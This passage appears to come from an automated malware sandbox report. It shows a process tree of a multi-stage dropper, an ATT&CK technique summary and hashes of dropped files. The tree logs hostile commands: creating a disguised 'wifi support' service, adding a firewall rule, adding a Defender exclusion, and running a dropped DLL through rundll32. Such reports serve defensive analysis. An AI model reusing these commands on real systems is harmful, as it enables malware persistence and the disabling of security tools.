                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --mojo-platform-channel-handle=1996 /prefetch:8
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:7812
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --mojo-platform-channel-handle=1780 /prefetch:8
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:6096
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1732 /prefetch:2
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                PID:6088
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2516 /prefetch:1
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                PID:4936
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2492 /prefetch:1
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                • Checks computer location settings
                                                                                                                                                                                                                                                                PID:8312
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3048 /prefetch:2
                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                  PID:60
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --mojo-platform-channel-handle=1728 /prefetch:8
                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                    PID:6480
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --mojo-platform-channel-handle=3364 /prefetch:8
                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                      PID:7732
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,13796656840007750649,15918977397439414622,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9108_690223309" --mojo-platform-channel-handle=3444 /prefetch:8
                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                        PID:8804
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat0292f4622e87ae.exe
                                                                                                                                                                                                                                                                Sat0292f4622e87ae.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:2824
                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                PID:5036
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                  PID:4784
                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                PID:1780
                                                                                                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                PID:7908
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6033.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\6033.exe
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:6964
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\fzhqarpz\
                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                      PID:8688
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\uzywmsbq.exe" C:\Windows\SysWOW64\fzhqarpz\
                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                        PID:8760
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                        "C:\Windows\System32\sc.exe" create fzhqarpz binPath= "C:\Windows\SysWOW64\fzhqarpz\uzywmsbq.exe /d\"C:\Users\Admin\AppData\Local\Temp\6033.exe\"" type= own start= auto DisplayName= "wifi support"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                          PID:8868
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                          "C:\Windows\System32\sc.exe" description fzhqarpz "wifi internet conection"
                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                            PID:8952
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                                                                                                                                                                            "C:\Windows\System32\sc.exe" start fzhqarpz
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                              PID:9096
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                                                                                                                              "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                PID:8364
                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                PID:4420
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\6FF3.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\6FF3.exe
                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                • Windows security modification
                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                PID:8308
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\a6cfd2cd-5903-45d3-bbf3-eed0fa55f9da\AdvancedRun.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\a6cfd2cd-5903-45d3-bbf3-eed0fa55f9da\AdvancedRun.exe" /EXEFilename "C:\Users\Admin\AppData\Local\Temp\a6cfd2cd-5903-45d3-bbf3-eed0fa55f9da\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                    PID:9044
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\a6cfd2cd-5903-45d3-bbf3-eed0fa55f9da\AdvancedRun.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\a6cfd2cd-5903-45d3-bbf3-eed0fa55f9da\AdvancedRun.exe" /SpecialRun 4101d8 9044
                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                        PID:6044
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\6FF3.exe" -Force
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:8472
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6FF3.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\6FF3.exe"
                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                          PID:9168
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\9CC1.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\9CC1.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                          PID:8348
                                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                                          PID:6636
                                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding A2F71350240FD86552340375B765738C C
                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            PID:8728
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\A676.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\A676.exe
                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                            PID:8744
                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                            • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                            PID:8836
                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                PID:4936
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                              PID:8788
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                • Modifies registry class
                                                                                                                                                                                                                                                                                                PID:8792
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\C0D5.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\C0D5.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                PID:8664
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\134C.exe
                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\134C.exe
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                                PID:9184
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                                PID:7364
                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                    PID:7388

                                                                                                                                                                                                                                                                                                Network

                                                                                                                                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                                                Execution

                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                Persistence

                                                                                                                                                                                                                                                                                                Modify Existing Service

                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                T1031

                                                                                                                                                                                                                                                                                                New Service

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1050

                                                                                                                                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1060

                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                Privilege Escalation

                                                                                                                                                                                                                                                                                                New Service

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1050

                                                                                                                                                                                                                                                                                                Scheduled Task

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1053

                                                                                                                                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                                                                                                                                Modify Registry

                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                T1112

                                                                                                                                                                                                                                                                                                Disabling Security Tools

                                                                                                                                                                                                                                                                                                4
                                                                                                                                                                                                                                                                                                T1089

                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1130

                                                                                                                                                                                                                                                                                                Credential Access

                                                                                                                                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                T1081

                                                                                                                                                                                                                                                                                                Discovery

                                                                                                                                                                                                                                                                                                Query Registry

                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                T1012

                                                                                                                                                                                                                                                                                                Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1497

                                                                                                                                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                                                                                                                                7
                                                                                                                                                                                                                                                                                                T1082

                                                                                                                                                                                                                                                                                                Peripheral Device Discovery

                                                                                                                                                                                                                                                                                                2
                                                                                                                                                                                                                                                                                                T1120

                                                                                                                                                                                                                                                                                                Collection

                                                                                                                                                                                                                                                                                                Data from Local System

                                                                                                                                                                                                                                                                                                3
                                                                                                                                                                                                                                                                                                T1005

                                                                                                                                                                                                                                                                                                Command and Control

                                                                                                                                                                                                                                                                                                Web Service

                                                                                                                                                                                                                                                                                                1
                                                                                                                                                                                                                                                                                                T1102

                                                                                                                                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                                                                                                                                Downloads

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Sat02a49e7e3a431c7.exe.log
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  41fbed686f5700fc29aaccf83e8ba7fd

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  5271bc29538f11e42a3b600c8dc727186e912456

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  df4e9d012687cdabd15e86bf37be15d6c822e1f50dde530a02468f0006586437

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  234b2235c1ced25810a4121c5eabcbf9f269e82c126a1adc363ee34478173f8b462e90eb53f5f11533641663350b90ec1e2360fd805b10c041fab12f4da7a034

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\09xU.exE
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat023473347dfed5a.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  ba8541c57dd3aae16584e20effd4c74c

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  5a49e309db2f74485db177fd9b69e901e900c97d

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat023473347dfed5a.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  ba8541c57dd3aae16584e20effd4c74c

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  5a49e309db2f74485db177fd9b69e901e900c97d

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02392068575.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  39fbed3967544cc6a59e1d1152cdcc35

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  b9e974a506f3be7fc78574ae008e7686093eb82d

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02392068575.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  39fbed3967544cc6a59e1d1152cdcc35

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  b9e974a506f3be7fc78574ae008e7686093eb82d

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat025fdceb8a76.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  b37a913d24f920d93872041e1e9c80f3

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  97de66d60bd86af1452073bd8e19803417f430a8

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  a596ee03d3735a3af2a32b3055ce8ab1517e1660cc6bd6ec868c9238d06c7512

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  17449e90f74bb77c79e60fa8e06ea621e2b7420974e3181801d8f7404ed6e75b549ad5eef78aacd18daa0e5e330d5f318b23f4c1a598901a5a0d4980bac0e4b2

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat025fdceb8a76.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  b37a913d24f920d93872041e1e9c80f3

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  97de66d60bd86af1452073bd8e19803417f430a8

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  a596ee03d3735a3af2a32b3055ce8ab1517e1660cc6bd6ec868c9238d06c7512

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  17449e90f74bb77c79e60fa8e06ea621e2b7420974e3181801d8f7404ed6e75b549ad5eef78aacd18daa0e5e330d5f318b23f4c1a598901a5a0d4980bac0e4b2

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02614aa7aa9e9d.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  7c6b2dc2c253c2a6a3708605737aa9ae

                                                                                                                                                                                                                                                                                                  SHA1

                                                                                                                                                                                                                                                                                                  cf4284f29f740b4925fb2902f7c3f234a5744718

                                                                                                                                                                                                                                                                                                  SHA256

                                                                                                                                                                                                                                                                                                  b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba

                                                                                                                                                                                                                                                                                                  SHA512

                                                                                                                                                                                                                                                                                                  19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS802A09F5\Sat02614aa7aa9e9d.exe
                                                                                                                                                                                                                                                                                                  MD5

                                                                                                                                                                                                                                                                                                  7c6b2dc2c253c2a6a3708605737aa9ae

